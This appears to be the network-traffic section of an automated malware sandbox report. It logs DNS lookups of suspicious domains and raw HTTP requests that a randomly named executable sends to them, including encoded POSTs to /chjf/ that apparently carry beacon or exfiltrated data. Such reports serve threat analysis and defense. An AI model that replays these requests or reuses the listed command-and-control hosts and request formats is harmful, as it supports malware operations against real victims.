                                                                                      Sep 30, 2024 10:44:41.968362093 CEST5881680192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:44:41.973345041 CEST80588163.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:44:41.973437071 CEST5881680192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:44:41.983114958 CEST5881680192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:44:41.989217043 CEST80588163.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:44:42.426778078 CEST80588163.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:44:42.426796913 CEST80588163.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:44:42.426990986 CEST5881680192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:44:42.430761099 CEST5881680192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:44:42.435616016 CEST80588163.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:44:48.044974089 CEST5881780192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:48.049911022 CEST8058817103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:44:48.050010920 CEST5881780192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:48.084320068 CEST5881780192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:48.089143038 CEST8058817103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:44:48.971019983 CEST8058817103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:44:48.971039057 CEST8058817103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:44:48.971086979 CEST5881780192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:49.593497038 CEST5881780192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:50.742897987 CEST5881880192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:50.747813940 CEST8058818103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:44:50.747888088 CEST5881880192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:50.862643003 CEST5881880192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:51.081144094 CEST8058818103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:44:51.684631109 CEST8058818103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:44:51.684946060 CEST8058818103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:44:51.685005903 CEST5881880192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:52.374389887 CEST5881880192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:53.398901939 CEST5881980192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:53.404629946 CEST8058819103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:44:53.406960964 CEST5881980192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:53.443300009 CEST5881980192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:53.448220015 CEST8058819103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:44:53.448371887 CEST8058819103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:44:54.368901014 CEST8058819103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:44:54.369004011 CEST8058819103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:44:54.369050980 CEST5881980192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:54.952434063 CEST5881980192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:55.971144915 CEST5882080192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:55.976109982 CEST8058820103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:44:55.979010105 CEST5882080192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:55.986051083 CEST5882080192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:55.990871906 CEST8058820103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:44:56.893110037 CEST8058820103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:44:56.893131971 CEST8058820103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:44:56.893284082 CEST5882080192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:56.946554899 CEST5882080192.168.2.6103.21.221.87
                                                                                      Sep 30, 2024 10:44:56.951735020 CEST8058820103.21.221.87192.168.2.6
                                                                                      Sep 30, 2024 10:45:01.993479013 CEST5882180192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:01.998533010 CEST80588213.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:45:02.000792027 CEST5882180192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:02.011888981 CEST5882180192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:02.016705990 CEST80588213.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:45:02.455751896 CEST80588213.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:45:02.455817938 CEST5882180192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:03.515116930 CEST5882180192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:03.520154953 CEST80588213.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:45:04.533658981 CEST5882280192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:04.538636923 CEST80588223.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:45:04.538743973 CEST5882280192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:04.549846888 CEST5882280192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:04.554691076 CEST80588223.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:45:04.994333029 CEST80588223.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:45:04.994400024 CEST5882280192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:06.061810017 CEST5882280192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:06.066695929 CEST80588223.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:45:07.080466032 CEST5882380192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:07.086847067 CEST80588233.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:45:07.086941957 CEST5882380192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:07.097801924 CEST5882380192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:07.102905035 CEST80588233.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:45:07.102920055 CEST80588233.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:45:08.484549046 CEST80588233.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:45:08.487031937 CEST5882380192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:09.118927002 CEST5882380192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:09.123971939 CEST80588233.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:45:10.153292894 CEST5882480192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:10.158736944 CEST80588243.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:45:10.158868074 CEST5882480192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:10.167176962 CEST5882480192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:10.172033072 CEST80588243.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:45:10.616065025 CEST80588243.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:45:10.616220951 CEST80588243.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:45:10.616296053 CEST5882480192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:10.618998051 CEST5882480192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:45:10.623826027 CEST80588243.33.130.190192.168.2.6

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Sep 30, 2024 10:41:50.897000074 CEST5362450162.159.36.2192.168.2.6
                                                                                      Sep 30, 2024 10:41:51.654367924 CEST53639131.1.1.1192.168.2.6
                                                                                      Sep 30, 2024 10:41:52.776964903 CEST6505053192.168.2.61.1.1.1
                                                                                      Sep 30, 2024 10:41:53.203794956 CEST53650501.1.1.1192.168.2.6
                                                                                      Sep 30, 2024 10:42:08.769295931 CEST5023453192.168.2.61.1.1.1
                                                                                      Sep 30, 2024 10:42:08.781402111 CEST53502341.1.1.1192.168.2.6
                                                                                      Sep 30, 2024 10:42:22.426078081 CEST5832553192.168.2.61.1.1.1
                                                                                      Sep 30, 2024 10:42:22.443957090 CEST53583251.1.1.1192.168.2.6
                                                                                      Sep 30, 2024 10:42:35.721123934 CEST5007753192.168.2.61.1.1.1
                                                                                      Sep 30, 2024 10:42:35.818608999 CEST53500771.1.1.1192.168.2.6
                                                                                      Sep 30, 2024 10:42:49.458062887 CEST5402753192.168.2.61.1.1.1
                                                                                      Sep 30, 2024 10:42:49.703211069 CEST53540271.1.1.1192.168.2.6
                                                                                      Sep 30, 2024 10:43:24.021281958 CEST6259153192.168.2.61.1.1.1
                                                                                      Sep 30, 2024 10:43:24.587341070 CEST53625911.1.1.1192.168.2.6
                                                                                      Sep 30, 2024 10:43:38.207009077 CEST5218553192.168.2.61.1.1.1
                                                                                      Sep 30, 2024 10:43:38.550585985 CEST53521851.1.1.1192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.112484932 CEST5078753192.168.2.61.1.1.1
                                                                                      Sep 30, 2024 10:43:52.163141012 CEST53507871.1.1.1192.168.2.6
                                                                                      Sep 30, 2024 10:44:05.833228111 CEST5933553192.168.2.61.1.1.1
                                                                                      Sep 30, 2024 10:44:05.925343990 CEST53593351.1.1.1192.168.2.6
                                                                                      Sep 30, 2024 10:44:19.346501112 CEST6409153192.168.2.61.1.1.1
                                                                                      Sep 30, 2024 10:44:20.358716965 CEST6409153192.168.2.61.1.1.1
                                                                                      Sep 30, 2024 10:44:20.546041012 CEST53640911.1.1.1192.168.2.6
                                                                                      Sep 30, 2024 10:44:20.546056032 CEST53640911.1.1.1192.168.2.6
                                                                                      Sep 30, 2024 10:44:34.176074028 CEST5742353192.168.2.61.1.1.1
                                                                                      Sep 30, 2024 10:44:34.190438032 CEST53574231.1.1.1192.168.2.6
                                                                                      Sep 30, 2024 10:44:47.507714987 CEST5415953192.168.2.61.1.1.1
                                                                                      Sep 30, 2024 10:44:47.824533939 CEST53541591.1.1.1192.168.2.6
                                                                                      Sep 30, 2024 10:45:01.965997934 CEST6349653192.168.2.61.1.1.1
                                                                                      Sep 30, 2024 10:45:01.990483046 CEST53634961.1.1.1192.168.2.6

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Sep 30, 2024 10:41:52.776964903 CEST192.168.2.61.1.1.10x52f9Standard query (0)www.dguy4youguys.wtfA (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:42:08.769295931 CEST192.168.2.61.1.1.10x4e10Standard query (0)www.8zu934.vipA (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:42:22.426078081 CEST192.168.2.61.1.1.10x5184Standard query (0)www.tophfy.infoA (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:42:35.721123934 CEST192.168.2.61.1.1.10xf053Standard query (0)www.030002837.xyzA (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:42:49.458062887 CEST192.168.2.61.1.1.10xef6Standard query (0)www.x4wrqqc2tn.sbsA (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:43:24.021281958 CEST192.168.2.61.1.1.10x7656Standard query (0)www.it9.shopA (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:43:38.207009077 CEST192.168.2.61.1.1.10x930aStandard query (0)www.18kwatch.comA (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:43:52.112484932 CEST192.168.2.61.1.1.10xd2b6Standard query (0)www.accupower.techA (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:44:05.833228111 CEST192.168.2.61.1.1.10x84e8Standard query (0)www.restobarbebek.xyzA (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:44:19.346501112 CEST192.168.2.61.1.1.10x3f2bStandard query (0)www.cqghwamc.topA (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:44:20.358716965 CEST192.168.2.61.1.1.10x3f2bStandard query (0)www.cqghwamc.topA (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:44:34.176074028 CEST192.168.2.61.1.1.10x4233Standard query (0)www.yesonkoicasino.netA (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:44:47.507714987 CEST192.168.2.61.1.1.10x2ba8Standard query (0)www.rtpterbaruwaktu3.xyzA (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:45:01.965997934 CEST192.168.2.61.1.1.10x6366Standard query (0)www.mondayigboleague.infoA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Sep 30, 2024 10:41:53.203794956 CEST1.1.1.1192.168.2.60x52f9No error (0)www.dguy4youguys.wtfredirect.3dns.boxCNAME (Canonical name)IN (0x0001)false
                                                                                      Sep 30, 2024 10:41:53.203794956 CEST1.1.1.1192.168.2.60x52f9No error (0)redirect.3dns.box172.191.244.62A (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:42:08.781402111 CEST1.1.1.1192.168.2.60x4e10No error (0)www.8zu934.vip8zu934.vipCNAME (Canonical name)IN (0x0001)false
                                                                                      Sep 30, 2024 10:42:08.781402111 CEST1.1.1.1192.168.2.60x4e10No error (0)8zu934.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:42:08.781402111 CEST1.1.1.1192.168.2.60x4e10No error (0)8zu934.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:42:22.443957090 CEST1.1.1.1192.168.2.60x5184No error (0)www.tophfy.info203.161.41.205A (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:42:35.818608999 CEST1.1.1.1192.168.2.60xf053No error (0)www.030002837.xyz030002837.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                      Sep 30, 2024 10:42:35.818608999 CEST1.1.1.1192.168.2.60xf053No error (0)030002837.xyz65.21.196.90A (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:42:49.703211069 CEST1.1.1.1192.168.2.60xef6No error (0)www.x4wrqqc2tn.sbs172.217.31.4A (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:43:24.587341070 CEST1.1.1.1192.168.2.60x7656No error (0)www.it9.shop121.254.178.239A (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:43:38.550585985 CEST1.1.1.1192.168.2.60x930aNo error (0)www.18kwatch.com202.87.223.248A (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:43:52.163141012 CEST1.1.1.1192.168.2.60xd2b6No error (0)www.accupower.techaccupower.techCNAME (Canonical name)IN (0x0001)false
                                                                                      Sep 30, 2024 10:43:52.163141012 CEST1.1.1.1192.168.2.60xd2b6No error (0)accupower.tech217.160.0.158A (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:44:05.925343990 CEST1.1.1.1192.168.2.60x84e8No error (0)www.restobarbebek.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Sep 30, 2024 10:44:05.925343990 CEST1.1.1.1192.168.2.60x84e8No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Sep 30, 2024 10:44:05.925343990 CEST1.1.1.1192.168.2.60x84e8No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:44:20.546041012 CEST1.1.1.1192.168.2.60x3f2bNo error (0)www.cqghwamc.top221.128.225.57A (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:44:20.546056032 CEST1.1.1.1192.168.2.60x3f2bNo error (0)www.cqghwamc.top221.128.225.57A (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:44:34.190438032 CEST1.1.1.1192.168.2.60x4233No error (0)www.yesonkoicasino.netyesonkoicasino.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Sep 30, 2024 10:44:34.190438032 CEST1.1.1.1192.168.2.60x4233No error (0)yesonkoicasino.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:44:34.190438032 CEST1.1.1.1192.168.2.60x4233No error (0)yesonkoicasino.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:44:47.824533939 CEST1.1.1.1192.168.2.60x2ba8No error (0)www.rtpterbaruwaktu3.xyzrtpterbaruwaktu3.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                      Sep 30, 2024 10:44:47.824533939 CEST1.1.1.1192.168.2.60x2ba8No error (0)rtpterbaruwaktu3.xyz103.21.221.87A (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:45:01.990483046 CEST1.1.1.1192.168.2.60x6366No error (0)www.mondayigboleague.infomondayigboleague.infoCNAME (Canonical name)IN (0x0001)false
                                                                                      Sep 30, 2024 10:45:01.990483046 CEST1.1.1.1192.168.2.60x6366No error (0)mondayigboleague.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                      Sep 30, 2024 10:45:01.990483046 CEST1.1.1.1192.168.2.60x6366No error (0)mondayigboleague.info15.197.148.33A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • www.dguy4youguys.wtf
                                                                                      • www.8zu934.vip
                                                                                      • www.tophfy.info
                                                                                      • www.030002837.xyz
                                                                                      • www.x4wrqqc2tn.sbs
                                                                                      • www.it9.shop
                                                                                      • www.18kwatch.com
                                                                                      • www.accupower.tech
                                                                                      • www.restobarbebek.xyz
                                                                                      • www.cqghwamc.top
                                                                                      • www.yesonkoicasino.net
                                                                                      • www.rtpterbaruwaktu3.xyz
                                                                                      • www.mondayigboleague.info

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.658772172.191.244.62802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:41:53.224987984 CEST508OUTGET /u1fq/?YDT4P=4xd8DzO&9jtPKX=8UziavWSK51wGh0yfoTPy09mw+AH3TZF6FMeVKjGe1eDtK62tODY8LE6LrUWxP2eUghCVKFR11/7ghpDkFpQ+ayhRkiuH+sQiiZHhsOmXN2fYM4UxJmKdMp/tZGxM5I0WcTc5ok= HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.dguy4youguys.wtf
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:41:53.699368000 CEST195INHTTP/1.1 404 Not Found
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Date: Mon, 30 Sep 2024 08:41:53 GMT
                                                                                      Content-Length: 19
                                                                                      Connection: close
                                                                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                      Data Ascii: 404 page not found


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.6587743.33.130.190802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:42:08.799442053 CEST757OUTPOST /chjf/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.8zu934.vip
                                                                                      Origin: http://www.8zu934.vip
                                                                                      Referer: http://www.8zu934.vip/chjf/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 61 43 75 6a 4d 73 61 36 51 67 42 6f 33 6b 36 56 31 51 70 6a 63 41 57 4c 62 48 41 5a 61 4a 6d 46 4b 6d 59 79 58 47 4a 50 68 4a 4e 46 44 52 4d 4b 62 68 36 31 76 73 72 42 74 73 32 6d 4a 6e 63 54 4b 69 35 36 4a 6f 6a 73 6b 35 4c 65 61 43 4c 4c 42 53 31 35 6a 65 33 74 78 74 69 44 77 49 4f 45 52 34 59 64 5a 65 61 71 50 33 68 76 4e 49 7a 4a 43 2b 55 4f 44 4c 54 67 36 6f 6f 2b 32 76 76 75 63 50 2f 44 37 39 78 74 73 34 4c 57 77 49 57 53 56 57 30 35 4e 62 46 72 38 4d 57 63 44 52 7a 33 49 39 32 6f 63 34 50 49 75 49 47 61 54 30 76 32 49 54 76 47 5a 71 6e 6e 65 42 75 4a 48 53 7a 62 6d 57 58 4e 50 53 66 32 42 66 79 4b
                                                                                      Data Ascii: 9jtPKX=aCujMsa6QgBo3k6V1QpjcAWLbHAZaJmFKmYyXGJPhJNFDRMKbh61vsrBts2mJncTKi56Jojsk5LeaCLLBS15je3txtiDwIOER4YdZeaqP3hvNIzJC+UODLTg6oo+2vvucP/D79xts4LWwIWSVW05NbFr8MWcDRz3I92oc4PIuIGaT0v2ITvGZqnneBuJHSzbmWXNPSf2BfyK


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.6587753.33.130.190802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:42:11.349627972 CEST781OUTPOST /chjf/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.8zu934.vip
                                                                                      Origin: http://www.8zu934.vip
                                                                                      Referer: http://www.8zu934.vip/chjf/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 61 43 75 6a 4d 73 61 36 51 67 42 6f 30 48 79 56 34 58 39 6a 55 41 57 49 58 6e 41 5a 44 5a 6d 2f 4b 6d 55 79 58 48 4e 66 6d 36 70 46 45 31 49 4b 61 67 36 31 73 73 72 42 6c 4d 32 76 4e 6e 63 4e 4b 69 30 46 4a 70 66 73 6b 39 72 65 61 47 48 4c 42 46 42 36 69 4f 33 72 36 4e 69 42 39 6f 4f 45 52 34 59 64 5a 65 65 51 50 33 35 76 4f 37 72 4a 44 66 55 4e 63 37 54 6a 73 59 6f 2b 39 50 76 71 63 50 2b 67 37 38 74 55 73 37 2f 57 77 4e 79 53 56 48 30 2b 44 62 46 6c 68 63 58 30 47 6a 76 39 49 62 37 57 62 65 44 2b 76 59 47 6b 66 69 75 73 55 67 76 6c 4c 36 48 6c 65 44 32 37 48 79 7a 78 6b 57 76 4e 64 46 54 52 4f 72 58 70 32 64 66 49 65 65 6c 54 37 37 6b 35 69 55 78 39 33 6d 5a 55 4a 51 3d 3d
                                                                                      Data Ascii: 9jtPKX=aCujMsa6QgBo0HyV4X9jUAWIXnAZDZm/KmUyXHNfm6pFE1IKag61ssrBlM2vNncNKi0FJpfsk9reaGHLBFB6iO3r6NiB9oOER4YdZeeQP35vO7rJDfUNc7TjsYo+9PvqcP+g78tUs7/WwNySVH0+DbFlhcX0Gjv9Ib7WbeD+vYGkfiusUgvlL6HleD27HyzxkWvNdFTROrXp2dfIeelT77k5iUx93mZUJQ==


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.6587763.33.130.190802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:42:14.403007984 CEST1794OUTPOST /chjf/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.8zu934.vip
                                                                                      Origin: http://www.8zu934.vip
                                                                                      Referer: http://www.8zu934.vip/chjf/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 61 43 75 6a 4d 73 61 36 51 67 42 6f 30 48 79 56 34 58 39 6a 55 41 57 49 58 6e 41 5a 44 5a 6d 2f 4b 6d 55 79 58 48 4e 66 6d 36 68 46 45 41 63 4b 62 44 43 31 74 73 72 42 72 73 32 69 4e 6e 64 49 4b 69 74 4d 4a 70 53 5a 6b 2f 54 65 62 6c 50 4c 51 42 64 36 6f 4f 33 72 31 74 69 4d 77 49 4f 52 52 34 49 5a 5a 65 75 51 50 33 35 76 4f 2b 6e 4a 44 4f 55 4e 65 37 54 67 36 6f 6f 36 32 76 76 43 63 50 6e 62 37 39 5a 45 73 49 6e 57 77 74 69 53 58 31 4d 2b 50 62 46 6e 67 63 58 73 47 6a 69 6e 49 64 65 76 62 65 65 6c 76 66 47 6b 61 30 33 44 4f 69 66 31 64 59 4b 48 4c 67 7a 5a 42 43 76 51 73 31 4c 41 4e 6b 76 41 47 36 76 68 74 35 4c 31 66 2b 63 54 7a 49 59 6b 73 6a 6f 2b 39 58 34 39 55 34 2f 67 64 62 4f 43 48 67 75 56 6a 77 7a 47 78 6e 49 67 70 42 6a 68 6a 4e 78 4a 2b 61 63 51 63 35 4a 38 53 68 59 4d 36 30 44 72 57 7a 4e 42 63 47 71 48 67 77 6c 51 53 58 6a 71 30 62 4e 2b 49 41 50 51 41 61 30 69 74 57 37 51 73 37 30 7a 4e 56 51 6b 43 65 75 39 71 4b 4f 41 79 48 30 52 61 5a 53 34 4a 43 4b 74 66 66 51 [TRUNCATED]
                                                                                      Data Ascii: 9jtPKX=aCujMsa6QgBo0HyV4X9jUAWIXnAZDZm/KmUyXHNfm6hFEAcKbDC1tsrBrs2iNndIKitMJpSZk/TeblPLQBd6oO3r1tiMwIORR4IZZeuQP35vO+nJDOUNe7Tg6oo62vvCcPnb79ZEsInWwtiSX1M+PbFngcXsGjinIdevbeelvfGka03DOif1dYKHLgzZBCvQs1LANkvAG6vht5L1f+cTzIYksjo+9X49U4/gdbOCHguVjwzGxnIgpBjhjNxJ+acQc5J8ShYM60DrWzNBcGqHgwlQSXjq0bN+IAPQAa0itW7Qs70zNVQkCeu9qKOAyH0RaZS4JCKtffQLGspwyndOJsnsKqzqz0qaJU3z1C2t6FLVYHkYYR7nekOpF1Pru3emadWc+XKFTn6grmhVH1vrAQGKQIMK9FP08jLS1k/dARVSAT5gb0AXNaDj8X7YnHVzxfgqdPq7ceDb4vM1mOKB3re7N2chpxV5tpiU1NDjclXGxBwBiy79wQZ5+KUkLdrhws9CnoMAK/WUPkTh91EogrFIuxql/aZbWSpy0d8AP10abHg9RyLQQuHhr+ISX7x3zZJoAuHhNy/IzIWmzo7moSw8rEHWZi7yJvlT02PUEfxvG3hKe1wj+Vq3F6eZxDavYcYZ8U7zwlQaML+zBl6qvJSI/WS5C1iejucAMQ1Dv8yNHlpq/OxxEg8b6/K2n8ot2S4CW3gfFub56Ip9nAOkCWOkCGjfcpBnsJ+oIb3CQfHkUCctV8wwYoKSGFa+YHs8goDrEwQN7CSvXxN4nPRNH30KZktofR4zcr6kIh0QtmbMxmrW8C/kyMZd7soIRsjErpDqYCRADOYMbWas3qhQqc8aLSQIXS0cDtYke8/Cjmhod2E2e6WtVB8ujsN7pKKfNRodqEu1TMYdV0s3javzUbfBVxYqUX6aHPE+17qft4MJKTi0lXROOKgjjPlvwg4I5fp4cxxSEvJDY7Crkntbjb608+3gysS2ulcPkmIN1uiN3 [TRUNCATED]


